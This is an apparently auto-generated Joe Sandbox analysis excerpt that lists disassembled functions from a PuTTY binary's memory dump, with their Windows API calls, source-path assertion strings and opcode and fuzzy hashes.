                    • API ID: ErrorFormatLastMessage_strlen
                    • String ID: (unable to format: FormatMessage returned %u)$Error %d: %s
                    • API String ID: 2706427827-1777221902
                    • Opcode ID: fd9f00d8f7ef42c25e8d8254867432f2c820e1f7d81d8ed44a34d0eda75dac4e
                    • Instruction ID: 0d0b4001484fd8f9f45946491bd2b867d0122579566704ffe05445c136ef9a14
                    • Opcode Fuzzy Hash: fd9f00d8f7ef42c25e8d8254867432f2c820e1f7d81d8ed44a34d0eda75dac4e
                    • Instruction Fuzzy Hash: 322129B1A443806BD731AB25AC07F9B3FE4EB59740F040578F599D62A2FBB1A8409393
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C6828B Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00C68397
                    • IsValidCodePage.KERNEL32(00000000), ref: 00C683E0
                    • IsValidLocale.KERNEL32(?,00000001), ref: 00C683EF
                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C68437
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C68456
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                    • String ID:
                    • API String ID: 415426439-0
                    • Opcode ID: d529aa82983fa196cba34a6bca15c7ced294a45e4f2f621a133f9381970d0d2b
                    • Instruction ID: ddadb40bcb86abd04e1a6314463b8d22d18fd61ae240c638522d2674dae21c51
                    • Opcode Fuzzy Hash: d529aa82983fa196cba34a6bca15c7ced294a45e4f2f621a133f9381970d0d2b
                    • Instruction Fuzzy Hash: 975151719002059FDB30DFA5DC85BBE77B8AF44B00F144679E511EB2A0EF749A48DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C69013 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C69103
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 1a28c1c9fa718171fcb636ddfaf48b33c78f685d8055b7635d4347d97da3a3de
                    • Instruction ID: cab9900068683ff3d139ffdbcc5a87599a844e309a29a14f772d5b6de85522c8
                    • Opcode Fuzzy Hash: 1a28c1c9fa718171fcb636ddfaf48b33c78f685d8055b7635d4347d97da3a3de
                    • Instruction Fuzzy Hash: 1671D371905129AFDF30EF24CCD9AAEB7BDEB4A304F2442D9E01993251DA318E859F10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C4E52A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C4E536
                    • IsDebuggerPresent.KERNEL32 ref: 00C4E602
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C4E622
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00C4E62C
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    • String ID:
                    • API String ID: 254469556-0
                    • Opcode ID: 7a24bb0b3dbc03c56a4a7e73829bf728df96f30e41cfe9c81b456634b85f6d0b
                    • Instruction ID: 168cdae28bce8e793246df8d132483f06b5f1f90509b50014c602e02f080bc39
                    • Opcode Fuzzy Hash: 7a24bb0b3dbc03c56a4a7e73829bf728df96f30e41cfe9c81b456634b85f6d0b
                    • Instruction Fuzzy Hash: CD31E575D452189BDB20DFA4D989BCDBBB8BF08304F1041AAE409AB250EB759B849F45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C34F70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __aulldiv
                    • String ID: UUUU$UUUU
                    • API String ID: 3732870572-2425103364
                    • Opcode ID: 56facb44e308b05d7b9a339a859ae007ab4033dc61d664f0558e399edbc0109d
                    • Instruction ID: ab9423b8e9051f3ff927bec930e8f1fa077d82a504c7051c6c6e082e9c6acc4e
                    • Opcode Fuzzy Hash: 56facb44e308b05d7b9a339a859ae007ab4033dc61d664f0558e399edbc0109d
                    • Instruction Fuzzy Hash: DA41BF327042154BC318CA3DCD5572AF7E6EBD8751F0A862EF488DB3E5EA35D9118A81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD2FA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendDlgItemMessageA.USER32(?,?,000000B1,?,?), ref: 00BD302A
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD3006
                    • c && c->ctrl->type == CTRL_EDITBOX, xrefs: 00BD300B
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemMessageSend
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                    • API String ID: 3015471070-2506229160
                    • Opcode ID: e75c7fffa8844b9ba7e33a73b873d6c0cef42a436498162785e210f31cb0300b
                    • Instruction ID: 1aeb6343b3516dc55feaa9675f3a32bdade8ccbf96240b4355cdf10fe0671c18
                    • Opcode Fuzzy Hash: e75c7fffa8844b9ba7e33a73b873d6c0cef42a436498162785e210f31cb0300b
                    • Instruction Fuzzy Hash: 12115B76644309AFD2109F44DC81A6AF3E8FB59708F050966F944A3312E372BE549BA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BECBA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(00000000,GetVersionExA), ref: 00BECBF6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc
                    • String ID: GetVersionExA$kernel32.dll
                    • API String ID: 190572456-3521452493
                    • Opcode ID: 5cf4abacc4a8ea742b28cadac88932a6a0961d7252815395a26b674182315a08
                    • Instruction ID: 4f6b6b4181bd0b7cbfc54b46cd6b75391cfd2541781d9d3598e9bc57e9debb60
                    • Opcode Fuzzy Hash: 5cf4abacc4a8ea742b28cadac88932a6a0961d7252815395a26b674182315a08
                    • Instruction Fuzzy Hash: 6911D3B09043D19BD7609F39ED46B0A7FE8E704710F114668E45A8B3E2D7389942CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C1D050 Relevance: 4.8, Strings: 3, Instructions: 1089COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c$word < x->nw$x0->nw == x1->nw
                    • API String ID: 0-1701883408
                    • Opcode ID: 998b6fd227dd217cdb0c3c06d4efdfc66f75548ecaa6d89382d7a2e5bf4d2a12
                    • Instruction ID: 081fced9dfb4b15b60407afd9b3c8b07428aa893e5a516e0697d0f74e3351bcd
                    • Opcode Fuzzy Hash: 998b6fd227dd217cdb0c3c06d4efdfc66f75548ecaa6d89382d7a2e5bf4d2a12
                    • Instruction Fuzzy Hash: 4082C175A04211DFD720DF18C881A6AB7E2FF8A300F59856CE85A9B341D731FD92EB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C6857C Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C685D0
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C6861A
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C686E0
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: InfoLocale$ErrorLast
                    • String ID:
                    • API String ID: 661929714-0
                    • Opcode ID: 9352f3fa7f033912e5479696f90e4bbc7de70009343605f9dd9629abb076d4d5
                    • Instruction ID: 061369c4fa4167abf2d53e3f7b0cec4a3ca01ac5a0d5567d413cc338dd1522f9
                    • Opcode Fuzzy Hash: 9352f3fa7f033912e5479696f90e4bbc7de70009343605f9dd9629abb076d4d5
                    • Instruction Fuzzy Hash: 2361B0716102179FDB389F24CDC2BAA77A8EF04704F204279FD25C6685EB78DA89DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C6413D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C64235
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C6423F
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C6424C
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: c98941de115b45ea0b9139a97609fdabd13a51509dcf9fdddd38a313c590125e
                    • Instruction ID: f6ccb648ff22ea37e6b1cde5a237d5d6481c2fb64aabee993d1d501146415e89
                    • Opcode Fuzzy Hash: c98941de115b45ea0b9139a97609fdabd13a51509dcf9fdddd38a313c590125e
                    • Instruction Fuzzy Hash: F731A374911328ABCB21DF64DD8979DBBB8BF48310F6041EAE81DA7251EB709F858F44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB82E0 Relevance: 4.6, APIs: 3, Instructions: 52windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BE8710: _strlen.LIBCMT ref: 00BE8720
                    • IsIconic.USER32 ref: 00BB8337
                    • SetWindowTextW.USER32(00000000,?), ref: 00BB8357
                    • SetWindowTextA.USER32(00000000,00000000), ref: 00BB8375
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: TextWindow$Iconic_strlen
                    • String ID:
                    • API String ID: 1204891203-0
                    • Opcode ID: f15d14617b27244128be384d6aff3c1f3640ea34a6c8d977fb2759c27fa3aefa
                    • Instruction ID: d0ca70ac5b674cbb159731837a2bbaf52ebd0ac5754f2f1f78d58d43d1421801
                    • Opcode Fuzzy Hash: f15d14617b27244128be384d6aff3c1f3640ea34a6c8d977fb2759c27fa3aefa
                    • Instruction Fuzzy Hash: 2401B5F19401406BEB512B20BC46F7F3BE9DB40719F1C01A4FD06A31B1EF629824D7A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB8230 Relevance: 4.6, APIs: 3, Instructions: 52windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BE8710: _strlen.LIBCMT ref: 00BE8720
                    • IsIconic.USER32 ref: 00BB8287
                    • SetWindowTextW.USER32(00000000,?), ref: 00BB82A7
                    • SetWindowTextA.USER32(00000000,00000000), ref: 00BB82C5
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: TextWindow$Iconic_strlen
                    • String ID:
                    • API String ID: 1204891203-0
                    • Opcode ID: 19d2a7fd081bfd5d22daf9a34d388b6e19c859b91b8bf1ff2fc01b35fd2d6a8d
                    • Instruction ID: b3680936a374ae683ee9169f9ca6c66ae45d46321b1279f69bccc4ebc910a8c5
                    • Opcode Fuzzy Hash: 19d2a7fd081bfd5d22daf9a34d388b6e19c859b91b8bf1ff2fc01b35fd2d6a8d
                    • Instruction Fuzzy Hash: 3F01B5F19406406BEF116B11BC47B7F3BA9EB40765F1805A4FD05A3161EB615824D792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BC2240 Relevance: 4.3, Strings: 3, Instructions: 575COMMON
                    Download Yara Rule
                    Strings
                    • chars != NULL, xrefs: 00BC2365
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/terminal/terminal.c, xrefs: 00BC2360, 00BC237B
                    • nchars_used < nchars_got, xrefs: 00BC2380
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/terminal/terminal.c$chars != NULL$nchars_used < nchars_got
                    • API String ID: 0-1149337742
                    • Opcode ID: 55954b8d218f43b2998781f8ff3390f467f2b0b8ba5a41412e2facfeb24b5408
                    • Instruction ID: af06d1bce26198e1caf79d4e396052daf7eff2760dd83c586ad41094bbde1e27
                    • Opcode Fuzzy Hash: 55954b8d218f43b2998781f8ff3390f467f2b0b8ba5a41412e2facfeb24b5408
                    • Instruction Fuzzy Hash: F322F5B05047808FD734DB34D885FABB7E2EB95314F1488ADE49A87292E775E984CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C1AB10 Relevance: 4.3, Strings: 3, Instructions: 512COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c$len <= pool->nw$scratch.nw >= mp_mul_scratchspace_unary(inlen)
                    • API String ID: 0-2369011873
                    • Opcode ID: 3090149e99c9dcc4324d782b91d065f615a5fa84c094bb1159aad1e0a5cd1e44
                    • Instruction ID: 3bbd31df8e983c68ca681fa746f81fe2ba980868dc40c57a06349103f2de944f
                    • Opcode Fuzzy Hash: 3090149e99c9dcc4324d782b91d065f615a5fa84c094bb1159aad1e0a5cd1e44
                    • Instruction Fuzzy Hash: 3B127D71B093019FC724DF68C490AAAB7E1BF89304F15893DE99AC7341E771AD85DB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C350F0 Relevance: 4.0, Strings: 3, Instructions: 240COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/ntru.c$n != 0$n == 1
                    • API String ID: 0-484143442
                    • Opcode ID: 6b742fca16dfbd3345a4ee3fb244c9c2857a9467f38cd278ee5018807bb1b858
                    • Instruction ID: b188cf9a8a22ffa9fc9036718e6bd910f6449b7ea657455ba0bddabac285eacc
                    • Opcode Fuzzy Hash: 6b742fca16dfbd3345a4ee3fb244c9c2857a9467f38cd278ee5018807bb1b858
                    • Instruction Fuzzy Hash: AE91A2B1A04702AFD324DF19C881B1AB7E2FF84304F19896CE5995B3A1E772F955CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C04B20 Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileA.KERNEL32(00000000), ref: 00C27B62
                    • FindClose.KERNEL32(00000000), ref: 00C27B79
                    • FindWindowA.USER32 ref: 00C27B8D
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirstWindow
                    • String ID:
                    • API String ID: 2475344593-0
                    • Opcode ID: b1fd8128ad765f2d36a4ec1c87c1487be178e43059d191c72afd48d6e61e07cb
                    • Instruction ID: ef9d3bb99ba781a3f97563ea16d87fd852028eaa032d3e863b0746cc10502cf0
                    • Opcode Fuzzy Hash: b1fd8128ad765f2d36a4ec1c87c1487be178e43059d191c72afd48d6e61e07cb
                    • Instruction Fuzzy Hash: 45F02BB16051505BC6207B39FC8ABBF7395DB8E365F140229FC6AC7290E7359C05E293
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C290C0 Relevance: 3.0, Strings: 2, Instructions: 520COMMON
                    Download Yara Rule
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/zlib.c, xrefs: 00C290DC
                    • !dctx->outblk, xrefs: 00C290E1
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: !dctx->outblk$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/zlib.c
                    • API String ID: 0-702135274
                    • Opcode ID: 3f636ded9a74e5e9f267401e4b834ee95e9aee9f8fe106900541f3f1b97a5473
                    • Instruction ID: 8369228ec8c6d4c2382f74bf76d757f4e654151838dff30409705d1518707d1e
                    • Opcode Fuzzy Hash: 3f636ded9a74e5e9f267401e4b834ee95e9aee9f8fe106900541f3f1b97a5473
                    • Instruction Fuzzy Hash: AF12EF71908621CBCB14CF29D498369B7A5FF85320F14C2ADD8D98B788DB74AC46DFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB8390 Relevance: 3.0, APIs: 2, Instructions: 18windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
